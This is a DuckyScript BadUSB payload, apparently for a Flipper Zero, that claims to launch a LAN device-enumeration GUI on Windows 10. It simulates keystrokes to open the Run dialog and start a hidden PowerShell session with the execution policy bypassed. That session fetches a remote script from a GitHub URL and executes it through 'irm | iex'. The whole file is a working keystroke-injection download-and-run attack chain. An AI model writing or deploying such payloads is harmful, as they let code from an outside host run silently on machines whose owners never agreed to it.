REM Title: beigeworm's LAN Device Enumeration GUI Tool.
REM Author: @beigeworm
REM Description: This script creates a GUI for enumerating devices on the local network.
REM Target: Windows 10

REM some setup for dukie script
DEFAULT_DELAY 100

REM open powershell (remove "-W H" to show the window)
DELAY 1000
GUI r
DELAY 750
STRING powershell -NoP -Ep Bypass -W H -C irm https://raw.githubusercontent.com/beigeworm/BadUSB-Files-For-FlipperZero/main/Network-Enumeration-GUI/main.ps1 | iex
ENTER


